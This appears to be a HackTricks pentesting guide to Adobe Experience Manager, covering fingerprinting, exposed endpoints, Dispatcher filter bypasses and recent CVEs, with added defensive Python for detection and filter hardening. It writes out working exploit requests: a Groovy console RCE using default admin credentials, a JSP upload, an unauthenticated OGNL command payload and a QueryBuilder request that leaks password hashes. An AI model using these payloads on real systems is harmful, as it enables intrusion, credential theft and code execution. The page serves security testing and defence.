AEM (Adobe Experience Manager) Pentesting
Tip
Learn and practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS built on Apache Sling/Felix (OSGi) and a Java Content Repository (JCR). From an attacker's perspective, AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a large number of CVEs that get patched every quarter.
The checklist below focuses on externally reachable (unauth) attack surface that keeps showing up in real engagements (2022-2026).
1. Fingerprinting
```bash
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1            # header added by AEM Dispatcher
X-Vary: Accept-Encoding
```
Other quick indicators:
- `/etc.clientlibs/` static path present (serves JS/CSS).
- `/libs/granite/core/content/login.html` login page with the "Adobe Experience Manager" banner.
- `</script><!--/* CQ */-->` comment at the bottom of the HTML.
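The same markers can be checked from a saved response rather than by eye. The following is an added example (not from the original page, and not AEM's or HackTricks' tooling) that parses one raw HTTP response and reports which of the indicators above it carries; the sample response, indicator names and the "two markers" threshold are this example's own.

```python
"""Parse one raw HTTP response and report which AEM markers from this page it carries."""
import re

# Indicator name -> (which part to search, regex). Built from the markers listed above.
INDICATORS = {
    "dispatcher-header":   ("headers", re.compile(r"^x-dispatcher:", re.I | re.M)),
    "aem-sling-cq-header": ("headers", re.compile(r"^[^\r\n]*(aem|sling|cq)[^\r\n]*", re.I | re.M)),
    "clientlibs-path":     ("body", re.compile(r"/etc\.clientlibs/")),
    "granite-login":       ("body", re.compile(r"/libs/granite/core/content/login")),
    "aem-banner":          ("body", re.compile(r"Adobe Experience Manager")),
    "cq-trailing-comment": ("body", re.compile(r"<!--/\*\s*CQ\s*\*/-->")),
}


def split_response(raw: str):
    """Split 'status line + headers + blank line + body' (CRLF framing)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, _, headers = head.partition("\r\n")
    return status_line, headers, body


def aem_indicators(raw_response: str) -> list:
    """Names of the markers present, in INDICATORS order."""
    _, headers, body = split_response(raw_response)
    return [name for name, (where, rx) in INDICATORS.items()
            if rx.search(headers if where == "headers" else body)]


def looks_like_aem(raw_response: str) -> bool:
    """Design choice for this example: require two independent markers before
    treating a host as AEM, so a single header name is not enough on its own."""
    return len(aem_indicators(raw_response)) >= 2


# Constructed sample response; header names are the ones shown in the curl output above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html;charset=utf-8\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "X-Dispatcher: hu1\r\n"
    "X-Vary: Accept-Encoding\r\n"
    "\r\n"
    "<html><head>\n"
    '<link rel="stylesheet" href="/etc.clientlibs/site/clientlibs/site.css">\n'
    "</head><body><h1>Welcome</h1>\n"
    '<script src="/etc.clientlibs/site/clientlibs/site.js"></script><!--/* CQ */-->\n'
    "</body></html>"
)

if __name__ == "__main__":
    print(aem_indicators(SAMPLE_RESPONSE), looks_like_aem(SAMPLE_RESPONSE))
```

Feed it the output of `curl -si https://target/` (headers and body together). From the defender's side every marker it returns is something the site is disclosing for free; the `X-Dispatcher` header in particular can be stripped at the web server.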
2. High-value unauthenticated endpoints
| Path | What you get | Notes |
|---|---|---|
| /.json, /.1.json | JCR nodes via DefaultGetServlet | Often blocked, but the Dispatcher bypass (see below) works. |
| /bin/querybuilder.json?path=/ | QueryBuilder API | Leaks page structure, internal paths and usernames. |
| /system/console/status-*, /system/console/bundles | OSGi/Felix console | 403 by default; if exposed and credentials are found ⇒ bundle-upload RCE. |
| /crx/packmgr/index.jsp | Package Manager | Allows uploading content packages with authentication → JSP payload upload. |
| /etc/groovyconsole/** | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution. |
| /libs/cq/AuditlogSearchServlet.json | Audit logs | Information disclosure. |
| /libs/cq/ui/content/dumplibs.html | ClientLibs dump | XSS vector. |
| /adminui/debug | AEM Forms on JEE Struts dev-mode OGNL evaluator | On misconfigured Forms installations (CVE-2025-54253) this endpoint evaluates unauthenticated OGNL → RCE. |
Dispatcher bypass tricks (still work in 2025/2026)
Most production sites sit behind the Dispatcher (reverse-proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions.
- Classic semicolon + allowed extension

```http
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```

- Encoded slash bypass (2025 KB ka-27832)

```http
GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1
```

If the Dispatcher allows encoded slashes, this returns JSON even when /bin is supposedly denied.
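To see why these two requests slip through, here is an added example (not from the original page and not Adobe's Dispatcher code): a simplified Python model of Dispatcher filter evaluation. It assumes the documented filter semantics (rules are evaluated in order and the last matching rule wins) and models Sling's URL handling as percent-decoding, dropping `;...` path parameters and collapsing `//`; both rule sets and the request list are constructed. Matching the raw URL with an extension-only allow rule lets both bypasses through; canonicalizing before matching, plus a deny-by-default rule set with path-scoped allows, does not.

```python
"""Simplified model of AEM Dispatcher /filter evaluation (teaching model, not the real module)."""
import fnmatch
import re
from urllib.parse import unquote


def canonicalize(raw_url: str) -> str:
    """Reduce a request URL to the resource path Sling will actually resolve.
    Assumed Sling behaviour: percent-decoding (repeated, to cover double encoding),
    query string ignored, ';...' path parameters dropped, '//' collapsed."""
    url = raw_url.split("?", 1)[0]
    for _ in range(3):                      # bounded: stop as soon as decoding is stable
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    url = url.split(";", 1)[0]
    return re.sub(r"/{2,}", "/", url)


def extension_of(path: str) -> str:
    """Extension as a naive filter sees it: text after the last '.' of the last segment."""
    last = path.rsplit("/", 1)[-1]
    return last.rsplit(".", 1)[1] if "." in last else ""


def evaluate(rules, raw_url: str, canonical: bool) -> str:
    """Return 'allow' or 'deny'. As in the real Dispatcher the LAST matching rule wins;
    a request that matches nothing is denied. Rules: {type, path glob?, extension regex?}."""
    path = canonicalize(raw_url) if canonical else raw_url.split("?", 1)[0]
    ext = extension_of(path)
    decision = "deny"
    for rule in rules:
        if "path" in rule and not fnmatch.fnmatchcase(path, rule["path"]):
            continue
        if "extension" in rule and not re.fullmatch(rule["extension"], ext):
            continue
        decision = rule["type"]
    return decision


# Weak rule set (constructed): allow-all start, a few path denies, then a global
# static-asset allow keyed only on the extension.
WEAK_RULES = [
    {"type": "allow", "path": "*"},
    {"type": "deny", "path": "/bin/*"},
    {"type": "deny", "path": "/system/*"},
    {"type": "deny", "path": "/crx/*"},
    {"type": "allow", "extension": "(css|js|png|gif|jpe?g|woff2?)"},   # applies at ANY path
]

# Hardened rule set (constructed): deny by default, allow only content and clientlibs with
# explicit path + extension, then re-deny the sensitive trees so nothing re-opens them.
HARDENED_RULES = [
    {"type": "deny", "path": "*"},
    {"type": "allow", "path": "/content/*", "extension": "html"},
    {"type": "allow", "path": "/etc.clientlibs/*", "extension": "(css|js|png|gif|jpe?g|woff2?)"},
    {"type": "deny", "path": "/bin/*"},
    {"type": "deny", "path": "/system/*"},
    {"type": "deny", "path": "/crx/*"},
    {"type": "deny", "path": "/libs/*"},
]

# Constructed requests: two legitimate ones plus the bypass shapes from this page.
REQUESTS = [
    "/content/site/en.html",
    "/etc.clientlibs/site/clientlibs/site.js",
    "/bin/querybuilder.json;%0aa.css?path=/home&type=rep:User",
    "/%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType",
    "//system/console/bundles",
    "/libs/cq/ui/content/dumplibs.html",
]


def compare(requests=REQUESTS) -> dict:
    """Per request: (weak rules on raw URL, weak rules canonicalized, hardened canonicalized)."""
    return {
        r: (
            evaluate(WEAK_RULES, r, canonical=False),
            evaluate(WEAK_RULES, r, canonical=True),
            evaluate(HARDENED_RULES, r, canonical=True),
        )
        for r in requests
    }


if __name__ == "__main__":
    for url, (weak_raw, weak_canon, hardened) in compare().items():
        print(f"{url:68} weak/raw={weak_raw:5} weak/canonical={weak_canon:5} hardened={hardened}")
```

The first column is the bypass: the `;%0aa.css` request is classified as `.css` and the `%2f` request never matches `/bin/*`, so the extension-only allow or the allow-all start wins. The middle column shows that normalizing before matching closes both, and the last column shows that a deny-by-default rule set also stops `/libs/cq/ui/content/dumplibs.html`, which the weak set never denied at all. The real fix lives in `dispatcher.any` and the web-server config (keep encoded slashes rejected, deny by default, allow only explicit path + extension pairs); the model only shows which ordering and normalization decisions matter.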
3. Common misconfigurations (still active in 2026)
- Anonymous POST servlet – `POST /.json` with `:operation=import` allows creating new JCR nodes. Blocking `*.json` POST requests in the Dispatcher fixes it.
- World-readable user profiles – the default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
- Default credentials – `admin:admin`, `author:author`, `replication:replication`.
- WCMDebugFilter enabled ⇒ reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installations).
- Groovy Console exposed – remote code execution by submitting a Groovy script:

```bash
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
```

- Dispatcher encoded-slash gap – `/bin/querybuilder.json` and `/etc/truststore.json` are reachable using `%2f`/`%3B` even when blocked by path filters.
- AEM Forms Struts devMode left enabled – `/adminui/debug?expression=` evaluates OGNL without authentication (CVE-2025-54253), leading to unauthenticated RCE; paired with the XXE in Forms submission (CVE-2025-54254) it allows file reads.
4. Recent vulnerabilities (service-pack cadence)
| Quarter | CVE / Bulletin | Affected | Impact |
|---|---|---|---|
| Dec 2025 | APSB25-115, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS → code execution via the author UI. |
| Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security-feature bypass chain (Dispatcher auth checker) – upgrade to 6.5.24/Cloud 2025.12. |
| Aug 2025 | CVE-2025-54253 / 54254 (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated. |
| Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. |
| Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code execution (low privilege). |
| Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS via a specially crafted URL. |
Always check the APSB bulletin that matches the client's service pack and request the latest version, 6.5.24 (Nov 26, 2025) or Cloud Service 2025.12. AEM Forms on JEE requires its own add-on hotfix 6.5.0-0108+.
5. Exploitation examples
5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
```http
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
```
Now request /content/evil.jsp – the JSP executes as the AEM process user.
5.2 SSRF to RCE (historical < 6.3)
```http
/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console
```
aem_ssrf2rce.py from aem-hacker automates the whole chain.
5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253)
```bash
# Unauth devMode OGNL to run whoami
curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()"
```
If vulnerable, the HTTP body contains the command output.
5.4 QueryBuilder hash disclosure (encoded slash bypass)
```http
GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1
```
Returns user nodes, including rep:password hashes, when the anonymous read ACLs are left at their defaults.
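On the blue-team side, every technique in sections 2, 3 and 5 leaves a recognisable shape in the Dispatcher or Apache access log. The following is an added example (not from the page and not part of aem-hacker): a Python scanner over constructed Apache combined-format log lines that tags the encoded-slash / semicolon bypass, QueryBuilder user enumeration, anonymous Sling POSTs to `.json`, the Forms devMode `expression=` call, `debug=layout` and Groovy console posts, and records whether each request got a 2xx. The tag names, the sensitive-prefix list and the sample lines are this example's own.

```python
"""Scan Apache/Dispatcher access-log lines for the AEM request shapes described on this page."""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Trees that should never be reachable from the internet on a publish instance.
SENSITIVE_PREFIXES = ("/bin/", "/system/console", "/crx/", "/etc/groovyconsole",
                      "/libs/cq/", "/adminui/", "/etc/truststore")


def normalize(raw_path: str) -> str:
    """Cheap canonical form: decode twice (double encoding), drop ';' params, collapse '//'."""
    path = unquote(unquote(raw_path)).split(";", 1)[0]
    return re.sub(r"/{2,}", "/", path)


def classify(method: str, target: str) -> list:
    """Return the technique tags one request line triggers (empty list = nothing notable)."""
    parts = urlsplit(target)
    raw_path, query = parts.path, parts.query
    path = normalize(raw_path)
    tags = []
    # Encoded slash / semicolon / newline / double slash that lands in a sensitive tree.
    if re.search(r"%2f|%3b|%0a|;|//", raw_path, re.I) and path.startswith(SENSITIVE_PREFIXES):
        tags.append("dispatcher-bypass")
    if path == "/bin/querybuilder.json":
        tags.append("querybuilder")
        if re.search(r"type=rep:User|p\.hits=full", query):
            tags.append("user-enum")          # rep:User nodes / full hits: hash-disclosure risk
    if path.startswith("/adminui/debug") and "expression=" in query:
        tags.append("forms-ognl-CVE-2025-54253")
    if "debug=layout" in query:
        tags.append("wcmdebugfilter-CVE-2016-7882")
    if path.startswith(("/bin/groovyconsole", "/etc/groovyconsole")):
        tags.append("groovy-console")
    elif method == "POST" and path.endswith(".json"):
        tags.append("sling-post-json")        # anonymous Sling POST servlet (":operation=import")
    return tags


def scan(lines) -> list:
    """Findings for every line that triggers a tag. 'succeeded' (2xx) is the field that matters:
    a 401/403 means the Dispatcher filter or authentication did its job."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["method"], m["target"])
        if tags:
            findings.append({
                "ip": m["ip"], "method": m["method"],
                "path": normalize(urlsplit(m["target"]).path),
                "status": int(m["status"]), "succeeded": m["status"].startswith("2"),
                "tags": tags,
            })
    return findings


# Constructed sample log (not real traffic): one benign line plus the shapes from sections 2-5.
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Jan/2026:10:01:02 +0000] "GET /content/site/en.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [12/Jan/2026:10:01:05 +0000] "GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User&p.hits=full HTTP/1.1" 200 8912 "-" "curl/8.4"',
    '203.0.113.10 - - [12/Jan/2026:10:01:09 +0000] "GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1" 403 199 "-" "curl/8.4"',
    '203.0.113.10 - - [12/Jan/2026:10:01:12 +0000] "POST /.json HTTP/1.1" 201 0 "-" "python-requests/2.31"',
    '203.0.113.10 - - [12/Jan/2026:10:01:20 +0000] "GET /adminui/debug?expression=1%2B1 HTTP/1.1" 200 60 "-" "curl/8.4"',
    '203.0.113.10 - - [12/Jan/2026:10:01:25 +0000] "GET /content/site/en.html?debug=layout HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [12/Jan/2026:10:01:30 +0000] "POST /bin/groovyconsole/post.json HTTP/1.1" 401 0 "-" "curl/8.4"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "!!" if f["succeeded"] else "  "
        print(f'{flag} {f["status"]} {f["method"]:4} {f["path"]:28} {",".join(f["tags"])}')
```

Run it over the real `access.log` / Dispatcher `request.log` with `scan(open(path))`. A tagged request with a 4xx is an attempt the filters caught; a tagged request with a 2xx is the one that needs the corresponding fix from section 3 (or the relevant APSB service pack), and `dispatcher-bypass` hits with 2xx mean the filter rules are matching the raw URL instead of the normalized path.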
6. Tools
- aem-hacker – comprehensive enumeration script; supports dispatcher bypass, SSRF detection, default-creds checks and more.
```bash
python3 aem_hacker.py -u https://target --host attacker-ip
```
- Tenable WAS plugin 115065 – detects QueryBuilder hash disclosure & the encoded-slash bypass automatically (published Dec 2025).
- Content brute-force – recursively request `/_jcr_content.(json|html)` to discover hidden components.
- osgi-infect – upload a malicious OSGi bundle via `/system/console/bundles` if creds are available.
References
- Adobe Security Bulletin APSB25-115 – Security updates for Adobe Experience Manager (Dec 9, 2025)
- BleepingComputer – Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)